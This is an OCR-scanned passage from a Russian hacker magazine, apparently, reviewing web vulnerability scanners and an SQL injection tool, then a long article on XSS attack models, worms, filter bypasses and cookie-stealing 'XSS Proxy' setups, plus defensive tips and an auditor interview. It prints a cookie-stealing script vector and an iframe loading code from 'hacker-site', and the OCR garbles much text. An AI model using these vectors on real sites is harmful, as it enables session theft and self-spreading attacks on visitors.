трафик, хорошая ско- 
рость желательна. 

Терпения и желания 
y Hac хватило на тести- 
рование пяти сценари- 
ев ивтрех из них най- 
дены уязвимости 
SQL Injection. Авторы, 
наверное, вообще 
не задумывались 
о безопасности. 

По завершении скани- 
рования программа 
предлагает небольшой 
отчет о проделанной 
работе и ссылки 

в Сети с описанием 
найденных ошибок 
свариантами 

их исправления 

(если у тебя нет 
проблем с английским, 
то это описание может 
пригодиться). 

На данный момент 
программа ищет ошиб- 
ки в сценариях на PHP 
vu ASP. В ближайшее 
время будет добавлен 
Macromedia Cold 
Fusion. Ошибки в сце- 
нариях Реп пока добав- 
лять не планируется, — 
с точки зрения меБ-ко- 
динга этот язык посте- 
пенно вымирает. 

По крайней мере, коли- 
чество сайтов, напи- 
санных на нем, сокра- 
щается, а новые прак- 
тически не появляются. 


Acunetix Web 
Vulnerability 
Scanner 


Wwww.acunetix.com 


$349 


ee Н ис + 


Разработчиком прог- 
раммы является раск- 
рученная Асипейх 
(внедавнем времени — 
малоизвестная). Рекла- 
му этой программы 
довольно часто можно 
встретить в Google ads. 
В триальной версии 
дозволено тестировать 
только сайты 
testphp.acunetix.com, 
testasp.acunetix.com 
v testaspnet.acunetix.com. 
Они созданы компани- 
ей специально для тес- 
тирования программы, 
но не факт, что на дру- 
гих серверах данный 
сканер безопасности 
покажет такие же ре- 
зультаты сканирова- 
ния и найдет хотя бы 
половину ошибок. 
Алгоритм поиска 
нам не известен, 
а разработчик его 
не афиширует. Так что 
реально проверить 
качество тестирования 
невозможно: будем 
отталкиваться от того, 
что известно и доступно. 
Vulnerability Scanner 
позволяет искать ошиб- 
ки в сценариях на язы- 
ках РНР, АЗР 
и АЗР.МЕТ. Помимо 
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этого, программа 
может проверять на 
ошибки JavaScript-cuye- 
нарии, что смело отно- 
сим к преимуществам. 
Можно тестировать 
не только напрямую, 
но и через HTTP или 
ЗОСК$ прокси-сер- 
вер — для обеспечения 
анонимности. 

Итак, что имеем на 
выходе: богатые, 
но не подтвержденные 
боевыми тестами воз- 
можности; красивый и 
удобный интерфейс; по- 
иск уязвимостей Х$$, 
SQL Injection, РНР-инк- 
людинг, поиск хакерс- 
ких запросов по базе 
Google, обход каталога, 
crif-injection, общедос- 
тупные резервные ко- 
пии сценариев; хоро- 
шая служба поддержки, 
которая всегда отвеча- 
ет, но не всегда вовре- 
мя (на наши вопросы 
разработчики ответили 
черезтри дня, правда, 
два из них были выход- 
НЫМИ). 

Если у тебя есть 
лишние 350 баксов, 
то можешь купить 
программу и юзать 
на здоровье. 
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SQL Injection Tools Этаутилитане ищет 


ISQLHack| 


n4nObit 


ошибки на сайте, a ис- 
пользует их для получе- 
ния определенной ин- 
формации о сервере/ба- 
зе данных. Она помога- 
етузнать версию серве- 
pa БД, ее имя, пользова- 
теля, подобрать имена 
таблиц и полей через 


уже найденную уязви- тельно должен 
мость. Некоторые любят — быть последним 
повторять, что через B url — «id=123». 


найденную уязвимость 
и обезьяна сможет уз- 
нать всю информацию. 
Но почему бы не облег- 
чить себе труд? 


Эта программа написа- 
на нашим соотечест- 
венником на Perl, иее 
любимая среда — Linux. 
Ищет SQL/PHP-Injection 
(в TOM числе, и в исход- 
никах), XSS через web, 


Если нашел уязвимый 
url, HO не знаешь, как 
им воспользоваться, 
загружай SQL Injection 
tools: 

1 Введи иг с napa- 
метрами, например 
www.target.com/in- 
dex.php?id=123. Уязви- 
мый параметр обяза- 


2 В поле «что ищем» 
введи кусок текста 
или слово, которое 
отображается, если 
загрузить, например, 
www.target.com/in- 
dex.php?id=123, 

и не отображается, 
если загрузить www.tar- 
get.com/index.php?id=123'. 

3 Дальше все ясно, 
кнопки говорят сами 
за себя. 

Утилита позволяет 
серьезно сэкономить 
время, — нужно только 
создать хороший слова- 
рик и скормить его 
SQL Injection tools. 


шой CGI-ckaHep. К co- 
жалению, ограничен- 
ность одним только 
языком РНР открывает 
не очень широкое поле 
боевых действий, но хо- 
роший анализатор пе- 


Paros Это не просто програм- 
ма для сканирования, 
это прокси-сервер, 


написанный Ha Java 
с продвинутыми 
возможностями 
для анализа. 

После загрузки 
Paros создает на твоей 
машине прокси. 

По умолчанию он рабо- 
тает на 8080 порте. 
Запускаешь браузер 

и идешь в свойства. 
Установи работу через 
прокси, укажи локаль- 
ную машину 127.0.0.1 

и порт 8080. Теперь 
можешь работать 

с интернетом, а в это 
время Paros будет 
сканировать открывае- 
мые сайты на наличие 
уязвимостей. Только 


приготовься потерять 
уйму трафика: кушает 
Раго$ с аппетитом 
(для тех, кто сидит 
на безлимитке, 
это не так критично). 
Программа позволя- 
ет модифицировать 
запросы к серверу, 
имеет кучу фильтров, 
может работать через 
удаленный прокси, об- 
ладает хорошими воз- 
можностями журнали- 
рования, но анализатор 
еще сырой. Явный 
недостаток — откро- 
венно убогий и неудоб- 
ный интерфейс. 
Отлично подойдет 
для анализа пакетов, 
но для автоматическо- 
го поиска уязвимостей 
не рекомендовал бы. 
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> итого. Мы показали разнопла- 
новые программы. Но информация 
быстро устаревает, появляются но- 
вые утилиты, а некоторые из старых 
могут «умирать». 

Но помни — программы авто- 
матизации не могут дать гарантии, 
что нет уязвимости на сервере. 
В большинстве случаев они нахо- 
дят откровенные ляпы, особенно 
когда включены сообщения об 
ошибках. Но если ошибки не выво- 
дятся и некоторые символы все же 


фильтруются, автоматический тест 
может ничего не дать. А вот обход 
фильтров вручную может быть куда 
более результативным. 

С другой стороны, «быстрый» 
тест позволяет понять, смогут ли 
данный сайт взломать начинаю- 
щие, малоопытные «хакеры» с на- 
бором чужих программ. Несмотря 
на отсутствие 100% результата, ре- 
комендуем использовать представ- 
ленные программки для экспресс- 
анализа. © 
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> в вашем алкоголе крови He обнаружено. Ти- 
пичная XSS-ataka состоит из следующих стандарт- 
ных этапов: 


1 ПОИСКА УЯЗВИМОСТИ; 


2 ВЫБОРА МЕТОДА ПЕРЕДАЧИ 
ИНФОРМАЦИИ ИЛИ ВОЗДЕЙСТВИЯ 
НА ПОЛЬЗОВАТЕЛЯ ЧЕРЕЗ XSS-BEKTOP; 


3 СОЗДАНИЯ ДОПОЛНИТЕЛЬНЫХ 
ИНСТРУМЕНТОВ ДЛЯ ПОДДЕРЖКИ 
Х$$-ПРОКСИ, УДАЛЕННО РАЗМЕЩЕН- 
НЫХ ФАЙЛОВ И ПРОЧЕГО; 


4 ПОИСКА СПОСОБА РАСПРОСТРАНЕНИЯ 
XSS-BEKTOPA; 


5 СОСТАВЛЕНИЯ ЭФФЕКТИВНОГО 
XSS-BEKTOPA; 


в УМЕЛОГО ЭКСПЛУАТИРОВАНИЯ 
ПОЛУЧЕННЫХ ДАННЫХ. 


Попытаемся детально разобрать общую идеоло- 
гию, классификацию и дать эвристический алго- 
ритм современных Х$$-атак — так сказать, осуще- 
ствить полное препарирование кросс-сайтового 
скриптинга. 
> классификация — вскрытие показало, что 
сайт ymep oT ... XSS. Х$$-атаки друг от друга отли- 
чает способ (а точнее сказать, модель) передачи 
данных между клиентом, сервером и хакером. В це- 
лом на настоящий момент известно три основных 
модели. 

1Х5$ DOM. В этой модели уязвимость сайта за- 
ключается в том, что не серверный скрипт, а имен- 
но клиентский JavaScript извлекает данные из URL 
страницы и внедряет их в HTML страницы через 
объекты Document Object Model (DOM, отсюда и 
название модели атаки). Итак, уязвимость сайта Ha- 
ходится в HTML — или JavaScript-cbainax, и стоит 


пользователю открыть ссылку, содержащую XSS- 
вектор хакера, как содержимое страницы будет из- 
менено и в нее уже непосредственно на машине 
клиента будет внедрен код из тела вектора. 
Данная модель атаки по своему результату и 
способу построения вектора полностью аналогична 
классической XSS-atake (она идет следующим 
пунктом). Единственное что, встречается она доста- 
точно редко. Однако если хакер не может взломать 
скрипты сервера и найти в них дыру, он обязатель- 
но прочтет весь JavaScript-kog (благо он всегда до- 
ступен для просмотра в отличие от того же РНР). 
И, возможно, именно там он и найдет уязвимость. 


пример уязвимой страницы 


пример вектора 


Другим важным моментом в отношении этого типа 
атак является то, что сервер и браузер атакуемого 
пользователя не осуществляли автоматического пре- 


КЛЮЧ 
КО МНОГИМ 
дверям 


Х$$ 


ВО МНОГИХ Х$$ УЖЕ ДАВНО HET 
НИКАКОГО КРОСС-САЙТОВОГО 

И ТЕМ БОЛЕЕ УЖ СКРИПТИНГА. 

НА САМОМ ДЕЛЕ ВСЕ ПРОСТО — 

ЛЮБАЯ ВОЗМОЖНОСТЬ ВОЗДЕЙСТВИЯ 

НА (ИЛИ ВЗАИМОДЕЙСТВИЯ С, ИЛИ 
ПРОСТО ПЕРЕДАЧИ ИНФОРМАЦИИ КИ ОТ) 
УДАЛЕННОГО ПОЛЬЗОВАТЕЛЯ, 
ОСУЩЕСТВЛЯЕМАЯ ЧЕРЕЗ УЯЗВИМЫЙ 
САЙТ УДАЛЕННЫМ ХАКЕРОМ, И БУДЕТ XSS. 
ЗНАЮЩИЕ ЛЮДИ УТВЕРЖДАЮТ, 

ЧТО ПРАВИЛЬНАЯ РАСШИФРОВКА 

XSS — ХАКЕРУ СДАВШИЙСЯ САЙТ. 


Dr. Maxim Orlovsky (www.arhont.com 


образования символов «<» и «>» в строке адреса 
в URL-encoded значения «%3C» и «%3E». Но храбрые 
хакеры всегда идут в обход. Обходным маневром 
в этом случае может оказаться использование знач- 
ка «#» (хэш или диез), ведь кусок URL после этого 
символа не является частью запроса, итакие браузе- 
ры как 6 Internet Explorer и Mozilla ero на сервер не пе- 
редают. Тогда атака с использованием вектора типа 
http://www.vulnerable.site/welcome.html#name=<script>alert(do- 
cument.cookie)</script> вполне может оказаться удачной. 

2 «Классический» XSS. Наиболее распространен- 
ная модель атак. В этой модели сервер имеет так 
называемую «непостоянную» (вообще, в русском 
языке трудно подобрать аналог для английского 
non-persistent или reflected) уязвимость. Если сер- 
верный скрипт недостаточно тщательно фильтрует 
переданные ему параметры, то тело Х$$-вектора 
попадает в результирующий HTML, CSS либо Ja- 
vaScript-kog, непосредственно в браузер клиента 
(смотри рисунок 1). Да, в С$$ тоже можно внедрять 
исполняемый код через использование конструк- 
ЦИЙ «url(«javascript:...»)». 

3 «Персистирующий» XSS. Фактически, этот тип 
атак связан с перманентным размещением параме- 
тров для скрипта, передаваемых от хакера на сер- 
вер, непосредственно в базе данных сервера и по- 
следующей выдачей миллионам посетителей сайта 
(чаще всего это форумы, блоги ит.п.). У этой модели 
есть два гигантских преимущества перед предше- 
ственниками: здесь не требуется рассылка данных 
от хакера к пользователю (все делается через сер- 
вер, и клиент ничего и никогда не заподозрит), и воз- 
можно создание так называемых Х$$-червей — 
каждый посетитель уязвимого форума/блога испол- 
нит код хакера, а этот код может размещать сам се- 
бя на других страницах уязвимого форума! 


Сервер 

= 

1 
2 
2 . Хакер 
A 
oy av Vv 
Пользователь Пользователь Пользователь 
сети сети сети 
3 


«Классический» XSS 


> структура Х$$-червя. Во-первых, cam червь 
должен включать в себя код для постинга на фору- 
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Весь этот код помещается на сайт, доступный для 
хакера, и грузится в браузеры посетителей фору- 


ма/блога через пост, содержащий текст вида <ifra- 
me src=http://nacker-site/xss.js>. Подобным образом, 
кстати, была произведена атака на блог МуЗрасе, 
когда в течение нескольких часов он был подверг- 
нут из-за роста числа запросов от червей жесткому 
DDoS'y. Так что DDoS — это еще одна фишка для 
Х$5$-атак третьего типа. Допустим, что надо под- 
вергнуть DDoS-atake некий сервер (который даже 
не имеет никакого отношения к Х$$). Пусть каждый 
клиент направит свой запрос на указанный сервер, 
используя тот же объект XMLHTTPRequest. Вуа ля, 
вот тебе десятки и десятки тысяч запросов в минуту. 
При этом ничто не мешает комбинировать внутри 
одного скрипта код для DDOS-atTaku и код для рас- 
пространения по форуму, чтобы увеличить число 
DDoS-sanpocos. Вот и скажи после этого, что XSS не 
представляет ничего опасного и серьезного. 

Идем далее: рассылка спама. Всего-то стоит 
внедрить в тело Х$$-вектора код для отправки поч- 
товых сообщений через публичные серверы веб- 
мейла, желательно не через один (если только ты 
не хочешь его смерти от DDOS'a), и вот тебе тонны 
корреспонденции. Опять же, в письмах можно рас- 
сылать адреса Х$$-уязвимых сайтов, в которые 
встроены Te же самые Х$$-векторы. Фактически, 
полет фантазии в этой области неограничен — 
ограничено лишь число серверов, имеющих такой 
«приятный» тип Х$$-уязвимости, как перманент- 
ное размещение кода. 
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3» составление Х$$-векторов для второй моде- 
ли атак. Удивительно, насколько часто, говоря об 
XSS, забывают про вопрос создания внедряемых 
XSS-BekTopos (фрагментов кода, который будет вы- 
полняться там), а ведь это, по сути, сердце взлома, 
сама отмычка. Все равно что говорить о том, сколь- 
ко в банке денег, рассказывать о типах замков на 
сейфе и отом, что потом делать с «честно» взяты- 
ми ассигнациями, но при этом ни слова не упомя- 
нуть об изготовлении отмычки для проникновения 
в сейф. Так что проведем некоторый ликбез. 
Подходя к вопросу того, как же именно луч- 
шим образом составить инъекционный Х$$-век- 
тор, просто невозможно не процитировать класси- 
ка отечественной науки Ландау — «это вам не фи- 
зика, здесь думать надо». Только он это говорил 
о преферансе, а не о Х$$, но аналогия вполне уме- 
стная. Талант преферансиста, равно как и «Х$$- 
векториста» — это интуиция взломщика, помно- 
женная на эрудицию специалиста и мастерство 
комбинирования Остапа Бендера. Но не думай, что 
все это так уж недоступно. Напротив, создать кра- 
сивый вектор для любого из типов XSS — это как 
два байта переслать. Вот и произведем по очереди 
разбор полетов по каждому из пунктов, дабы та- 
лант великого Бендера в купе с гениальностью Но- 
белевского лауреата осенил и нас. 
> смена контекста для вектора. Начнем 
с азов — структуры этого самого вектора. В нашем 
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что можно отнести 
к мифам о xss? 


1 НЕ ОПАСНО И ЗАЩИЩАТЬСЯ НЕ НАДО 
ОПАСНОСТЬ ОТ Х$$ НЕДООЦЕНИВАЕТСЯ. 

В ПЕРВУЮ ОЧЕРЕДЬ ИЗ-ЗА ТОГО, ЧТО CA- 
МУЮ ШИРОКУЮ ИЗВЕСТНОСТЬ ПОЛУЧИЛИ 
ПЕРВЫЕ XSS-ATAKU, КОТОРЫЕ ДЕЙСТВИ- 
ТЕЛЬНО НЕ МОГЛИ НАНЕСТИ СЕРЬЕЗНЫЙ 
УРОН. ТЕМ НЕ МЕНЕЕ, СОВРЕМЕННЫЕ МЕТО- 
ДЫ Х$$ ЗАЧАСТУЮ ГОРАЗДО БОЛЕЕ ОПАС- 
НЫ. ДОСТАТОЧНО УПОМЯНУТЬ УБЫТКИ ОТ 
ПЕРВОГО Х$$-ЧЕРВЯ, ЗАПУЩЕННОГО БЛА- 
ГОДАРЯ ДЫРАМ В ПУБЛИЧНОМ БЛОГЕ. 
УРОН ВПОЛНЕ МАТЕРИАЛЬНЫЙ И ИЗМЕРЯ- 
ЕМЫЙ КАК В ДЕНЕЖНЫХ ЗНАКАХ, ТАК И ГО- 
ДАХ ЗАКЛЮЧЕНИЯ, ГРОЗЯЩИХ XSS-XAKEPY. 


2 НИЧЕГО ОСОБО ИМ НЕ СДЕЛАЕШЬ 
ПОПРОБУЮ КЛАССИФИЦИРОВАТЬ ТОТ 
УЩЕРБ, КОТОРЫЙ МОЖЕТ НАНЕСТИ XSS. 
ВО-ПЕРВЫХ, ЭТО УЩЕРБ ИМИДЖУ КОМ- 
ПАНИИ-ДЕРЖАТЕЛЯ САЙТА. ИЗМЕНЕНИЕ 
И ИНЪЕКЦИЯ ТЕКСТА В НТМЕ-СТРАНИЦЫ 
И РАССЫЛКА ТАКИХ XSS-BEKTOPOB КЛИ- 
ЕНТАМ КОМПАНИИ МОЖЕТ НАНЕСТИ СУ- 
ЩЕСТВЕННЫЙ УЩЕРБ. ПОМНИТСЯ, КТО- 
ТО СМОГ ДАЖЕ ВНЕДРИТЬ В ОДИН ИЗ НО- 
ВОСТНЫХ САЙТОВ ИНТЕРВЬЮ БИЛЛА 
ГЕЙТСА О ПРЕИМУЩЕСТВАХ ОПЕРАЦИ- 
ОННЫХ СИСТЕМ ЛИНУКС ПО СРАВНЕНИЮ 
С ВИНДОУЗ. ВО-ВТОРЫХ, ЭТО ВОЗМОЖ- 
НОСТЬ ПОХИЩЕНИЯ ЗАКРЫТОЙ ИНФОР- 
МАЦИИ, ЧТО ОПЯТЬ ЖЕ ПОТЕНЦИАЛЬНО 
ВЕДЕТ К ЗНАЧИТЕЛЬНОМУ ЭКОНОМИЧЕ- 
СКОМУ УЩЕРБУ. В-ТРЕТЬИХ, ЭТО ВОЗ- 
МОЖНЫЕ 0005-АТАКИ, ОРГАНИЗУЕМЫЕ 
С ПОМОЩЬЮ Х$$-ЧЕРВЕЙ. НУ И, В-ЧЕТ- 
ВЕРТЫХ, ПРИ ОСОБОЙ УДАЧЕ ХАКЕРА 

И НАЛИЧИИ У КЛИЕНТА УЯЗВИМЫХ «ЭК- 
СПЛОРЕРОВ» — ВОЗМОЖНОСТЬ КОН- 
ТРОЛЯ ПОЛЬЗОВАТЕЛЬСКОГО БРАУЗЕ- 
РА, ДОСТУПА К ЛОКАЛЬНЫМ ФАЙЛАМ 

И ПРОЧИЕ «ИНТЕРЕСНОСТИ». 


3 ТЕМА XSS ДАВНО РАСКРЫТА 

ИНОГДА У МЕНЯ СКЛАДЫВАЕТСЯ ПРОТИ- 
ВОПОЛОЖНОЕ ВПЕЧАТЛЕНИЕ — TEMA XSS 
БЕСКОНЕЧНА И НЕ МОЖЕТ БЫТЬ 
ОХВАЧЕНА И ПОЛНОСТЬЮ РАСКРЫТА 
ДАЖЕ В БОЛЬШОМ ОБЗОРЕ. ВСЕ НОВЫЕ 
ВВЕДЕНИЯ И ПРАКТИЧЕСКИ КАЖДЫЙ СВЕ- 
KUN СТАНДАРТ ОТ W3C — ЭТО НОВЫЕ 
ВОЗМОЖНОСТИ ДЛЯ Х$$. ТЕОРЕТИЧЕСКИ, 
XSS МОЖЕТ БЫТЬ РЕАЛИЗОВАН HA ЛЮ- 
БОМ МАТЕРИАЛЕ, ПРЕДАВАЕМОМ СЕРВЕ- 
РОМ НА ЗАПРОС КЛИЕНТА, ЕСЛИ СЕРВЕР 
ИСПОЛЬЗУЕТ КЛИЕНТСКИЕ ДАННЫЕ В КА- 
ЧЕСТВЕ ФРАГМЕНТОВ ДЛЯ СВОЕГО ОТВЕ- 
ТА. ПОЭТОМУ В БЛИЖАЙШЕЕ ВРЕМЯ СО- 
ОБЩЕСТВО ПРОДОЛЖИТ РАДОВАТЬ НАС 
ВСЕ БОЛЕЕ ИЗОЩРЕННЫМИ МЕТОДАМИ 
КРОСС-САЙТОВОГО СКРИПТИНГА. 


случае начало вектора — это кусок кода, целью ко- 
торого является перевод изначального текстового 
контекста в контекст исполняемый. Tak, для URL- 
векторов началом будет служить в самом простом 
случае фрагмент типа: 


Если интересующий нас сайт содержит скрипт, пе- 
редающий в НТМЁЕ-код содержимое параметра 
из СЕТ-запроса, не фильтруя (или криво фильтруя) 
наличие скриптовых тэгов, этот пример должен 
сработать. В первой части приведенного примера 
просто закрываем НТМЕ-контекст, это надо делать 
только в том случае, если уязвимый сайт вставля- 
ет содержимое переданного параметра в конструк- 
цию типа: 


Поэтому, когда совместим XSS-BeKTOP и то, что 
идет в оригинальном тексте НТМЕ, то получим: 


Разумеется, для того чтобы правильно осуще- 
ствить смену контекста, надо предварительно про- 
анализировать исходный НТМЁ-код уязвимой 
страницы. Игнорирование этого простого момента 
на первый взгляд хоть и может дать вполне рабо- 
чий вектор, но в большинстве случаев оказывает- 
ся, что вектор работает только в одном браузере 
и не обладает кросс-браузерной совместимостью. 
Поэтому секрет кросс-браузерной работы номер 
один звучит просто: в исходной НТМЕ-странице 
для корректного составления вектора важно все. 
Если сервер выдает страницы XHTML, а не HTML 
(что должно проверяться по DOCTYPE и MIME), то 
не поленись в случае, указанном выше, использо- 
вать код: 


Дополнительный закрывающий слеш добавит лиш- 
нюю гарантию корректной работы вектора на лю- 
бой платформе и браузере. 

Для других, надо сказать, значительно ме- 
нее распространенных типов векторов (и даже 
тех, что еще возникнут только в перспективе вне- 
дрения новых технологий) к вопросу надо подхо- 
дить схожим образом: передаешь НТТР-вектор — 
не забудь дать последовательность корректного 
заголовка НТТР и правильную смену контекста. 
Скажем, есть гипотетический форум, который до- 
пускает загрузку на него файлов, при этом 
в скрытом параметре параллельно передается 
кодировка загружаемого файла. Тогда простой 
вектор может дать возможность передать конеч- 
ному пользователю вместо файла требуемый 


скрипт, который исполнится в браузере всех по- 
сетивших сайт: 


Для простоты восприятия специально до конца не 
перекодировали символы в формат URL-encoded. 

С первой частью вектора — закрытием контек- 
ста — более или менее понятно. Но это были цветоч- 
ки, сейчас начинаются ягодки. Из приведенных при- 
меров ты самостоятельно уяснил, что после закрытия 
контекста следует встраивание кода, который, есте- 
ственно, должен быть предварен чем-то, что поясня- 
ет браузеру, что код должен передаваться на испол- 
нение соответствующим образом. Самый простой 
способ сделать это в тех же УВ! -векторах — выре- 
зать тэг «<script...». Однако большинство современ- 
ных сервер-сайд-скрипт-киддеров, сорри, кодеров 
уже научились вырезать не только тэги «<script...», HO 
на пару с ними и «<object...», и «<embed...», и даже 
«<iframe...». Что делать в таких ситуациях? 

Смотри в корень, то есть в код! Внимательно 
проверяй все места, где уязвимый параметр вставля- 
ется в HTML уязвимой страницы уязвимым сервер- 
ным скриптом. Если параметр хоть раз встречается 
между тэгов «<head>...</head>», то можно использо- 
вать обманный ход «http-equiv». Как? А BOT Tak: 


Если же в параметре указывается имя С$$-страни- 
цы для выбора стиля представления, то можно ис- 
пользовать вектор: 


И так далее... 

Но если скрипт так хитер, что преобразует 
все угловые скобки тэгов в выражения типа «&lt;»? 
Тогда еще раз смотришь в код уязвимой HTML- 
страницы. Большинство НТМ!-тэгов поддержива- 
ют методы опсйск, onmouseover и так далее. Поэто- 
му если хоть в одном месте параметр вставляется 
в НТМЕ-код в виде атрибута любого тэга, можно 
без использования угловых скобок внедрить Ja- 
уаз сир! как в приведенном примере: 


Не работает? Умный сервер вырезает атрибуты 
html events? Превращает одинарные и двойные ка- 


вычки в значки типа «&quot;»? Думаем дальше. 
В качестве значений «Src» к тэгам изображений, 
«href» гиперссылок и прочего можно указывать кон- 
струкции типа «javascript:..code..». И не только в эт- 
их тэгах. Но, скажем, тот же Эксплорер 6 исполнит 
«<table background='javascript:...'>» и массу подоб- 
ных вариантов. Так что если параметр из URL пере- 
дается в эти тэги, то использование такой возмож- 
ности — дело техники. Другие решения из этой 
области: использовать в слове javascript пробелы, 
кодировать символы в HTML-entities (&#х6А; и т.д.), 
применять нестандартные events (onAbort, onActiva- 
te, onAfterPrint, onAfterUpdate, onBeforeActivate, on- 
BeforeCopy и другие). 

> = исполняемый код для Х$$. Завершив разбор 
первых двух частей вектора, рассмотрим то, что со- 
ставляет его тело — код. И как этот код может 
и должен работать. Здесь вновь придется вводить 
классификацию, ибо способов построения тела век- 
тора может быть бесчисленное множество (все за- 
висит от фантазии). Рассмотрим три основных ти- 
па: НТМЕ-векторы, векторы, содержащие Ja- 
vaScript, и векторы, внедряющие объекты (напри- 
мер, э\/-файлы). 

С первым все достаточно ясно, — он позволя- 
ет модифицировать структуру документа. В чем же 
интерес данного способа XSS? Во-первых, OH мо- 
жет быть применен для дефейса сайтов или для 
«порчи» имиджа компаний. Особо эффективный и 
опасный НТМЕ-Х$$ возможен для третьей модели 
атак, когда внедренный код размещается непо- 
средственно на сайте и становится виден всем его 
посетителям. Так, скажем, сайт veryimportantcorpo- 
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ration.com размещает у себя список самых попу- 
лярных запросов от пользователей, при этом фор- 
ма сбора запросов не содержит фильтрации НТМЕ- 
тэгов. В этом случае достаточно просто организо- 
вать большое число запросов с содержимым по ти- 
Пу «<iframe...» и помещать в состав сайта рекламу 
с сайта их прямых конкурентов :). Но это примитив- 
но. Гораздо большего результата можно достичь, 
если применять внедряемый JavaScript, который 
модифицирует DOM документа, меняя его загла- 
вие, размещенные изображения и текстовые стро- 
ки нужным образом. 

Реального эффекта и получения данных 
от пользователей можно достичь, если использо- 
вать динамические скрипты JavaScript или внедря- 
емые объекты. При таком подходе возможности 
XSS практически безграничны. 

Часто думают, что с помощью внедрения 
HTML можно достичь одного — модифицировать 
внешний вид страницы сайта. При этом ни о каком 
получении данных от пользователя не идет и речи. 
Но это не так. «Чувствительную информацию» 
(sensetive information — пароли, логины, явки и 
прочие сведения о пользователе) можно добыть и 
без JavaScript'a, и к тому есть ряд подходов. В пер- 
вую очередь это уже упомянутый XMLHttpRequest 


КАК 
ОБЕЗОПАСИТЬ 
СВОИ САИТ 

OT XSS? 


Единственная ситуация, когда ты мо- 
жешь не беспокоиться о безопасности 
сайта в плане XSS — это если он содер- 
жит исключительно статические txt 
и html-ctpaHuupl, без JavaScript, VB- 
Script, Java и встроенных объектов. 
То есть если он никогда не получает 
данные от пользователей и не работает 
с базами данных, которые могут быть 
модифицированы извне. В остальных 
случаях XSS возможен, и избежать его 
достаточно сложно (по крайней мере, 
это требует очень внимательного 
и тщательного подхода к написанию ко- 
да). Но есть ряд практических советов, 
которые хоть и не гарантируют абсо- 
лютную безопасность, но существенно 
увеличивают шансы избежать обилия 
дырок в своих сайтах. 


1 Использовать зарекомендовавшие 
себя и проверенные временем ореп 
source frameworks (по крайней мере, 
те их компоненты или избранные функ- 
ции, которые связаны с фильтрацией 
данных от пользователя). Проверка вре- 
менем определяется по тому, насколько 
часто в публичных баг-листах публику- 
ются вновь найденные Х$5-дыры в этих 
фреймворках. Только не забывай, что 
«мало найденных дыр» — это не всегда 
качество системы, зачастую это просто 
ее малая популярность. Поэтому если 
говорить об Open source, то нужен из- 
вестный, широко используемый и каче- 
ственно реализованный код. 

2Никогда не доверять ничему, что 
получено от пользователя. Об этом го- 
ворят многие и много, только забывают 
перечислять все потенциальные источ- 
ники для получения пользовательской 
информации. Так вот, данные от поль- 
зователя — это не только параметры 
в СЕТ и РОЗТ-запросах. Помимо этого 
следует обращать внимание на данные, 


читаемые скриптами из локальных 
файлов, и данные, читаемые из базы 
данных. Ведь зачастую хакер или же 
просто сотрудник-злоумышленник мо- 
жет получить доступ к локальным фай- 
лам или базе данных, а это самый эф- 
фективный вид Х$$-атаки: внедренные 
данные передаются всем посетителям 
файла, и для этого не нужны почтовые 
рассылки. Именно на таком типе XSS 
и реализуются самые деструктивные 
его формы — черви и прочее. 

зБезопасность более всего зависит 
не от используемых правил, рекоменда- 
ций, рецептов, источников кода и проче- 
го, а именно от того, кто все это делает 
иконтролирует — от программиста и ад- 
министратора. Правило «доработать на- 
пильником» — святое. Каждый продукт, 
несмотря на доверие кавтору кода (будь 
TO друг, ты сам или Open Source project), 
должен быть верифицирован и проверен 
в самых различных ситуациях профес- 
сионалами — процедура, именуемая ау- 
дитом безопасности необходима! 


Х$$-вектор вскрытый 


и технология AJAX (так называемый XSS-AJAX). 
Хакер на подвластной ему территории какого-ли- 
о веб-сервера размещает РНР-страницу, соби- 
рающую в лог (не важно — тестовый файл, базу 
данных или еще что) все те параметры, что ему пе- 
редаются, а так же куки. С другой стороны, XSS- 
вектор содержит код, который через XMLHttpRequ- 
est передает на этот скрипт все, что надо получить 
от пользователя. Такой способ получил название 
XSS Proxy: 


[oy 


ПА 


У 


beyond the invisible. XSS повсеместен. Глупо 
не обращать на него внимание при создании сай- 
тов. Развитие веба ведет к усложнению, а каждое 
усложнение — больше потенциальных дыр и воз- 


можностей для хакера. Усовершенствование си- 


ше, Х$$-черви — это только начало. Мы еще ста- 
нем свидетелями грядущих изощренных атак, ре- 
ализованных по принципам Х$$. Внедрение и 
расширение технологий и стандартов веб-серви- 
сов, RSS/Atom, XLink и XPath — основа для буду- 
щих видов атак и для дальнейшей эволюции ме- 
тодов XSS. © 
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жестокая 
правда 


Интервью с аудитором 
по безопастности 


ПОТЕНЦИАЛЬНО Х$$-УЯЗВИМОСТИ МОГУТ БЫТЬ 
НА 90% САЙТАХ, В ТОМ ЧИСЛЕ И НА ТВОЕМ 


О: Аудит безопастности — 

это дорогое удовольствие? 
А: Дороговизна услуг по аудиту безо- 
пасности — это миф. Но это с одной 
стороны, а с другой — потенциаль- 
ные заказчики, в основном, пофиги- 
сты, в том числе и ребята, работаю- 
rs щие в компаниях-гигантах. Любят, 
ЕВГЕНИИ ДОКУКИН чтобы им дыры находили на халяву, 
AUSTLIVE реагируют, когда их или их клиентов 
похакают, и аудиты безопасности 
{ID} особо заказывать не любят. Tak что 
В ИТ-и трии уже более 13 лет- сама отрасль только в начале своего 
того момента, как папа подарил пути (я имею в виду ручной аудит, так 
первый компьютер — Поиск-2 как сканеры уже заняли свою нишу). 
26-nport OB има Кто-то начинает пользоваться скане- 
‚2 года бличную деятельность рами безопасности (если он о них, 
фе 6-6 CHOC конечно, слышал), которые по-на- 
стоящему дороги и порой малоэф- 
фективны, что подтверждают сооб- 
щения о дырах на сайтах секьюрити- 
компаний, в том числе производите- 
|. лей этих самых сканеров. Да и в це- 
лом аудит безопасности, заказанный 
у.сот. у специалиста, будет эффективнее 

1 ПОС 3H исключительн и обойдется значительно дешевле. 

веб-безопасности. Активн Цена зависит от сайта, его раз- 
ся социальным секьюрити-  меров и количества сервисов на нем 
аудитом — безвозмездным поиском (а также количества типов уязвимо- 
| С ением стей для тестирования). Чем больше 
сайт, тем больше сроки тестирования 
и итоговая цена. Но всегда можно до- 


говориться и найти приемлемую цену 
проверки конкретного ресурса. Для 
небольших ресурсов ее стоимость 
может быть в районе нескольких со- 
тен долларов. Другими словами, це- 
на договорная. Причем аудит может 
быть разовым, а повторно обращать- 
ся к нему можно через некоторое вре- 
мя уже по мере необходимости. 

Если говорить о серьезных про- 
ектах, то на безопасность нужно выде- 
лять до 10% от стоимости (оценочной) 
бизнеса. Но учитывая наш ментали- 
тет, любовь к халяве и стойкое жела- 
ние не платить за свою безопасность, 
часто выделяемый бюджет на безо- 
пасность стремится, увы, к нулю... 

О: Если бы ты составлял рейтинг 
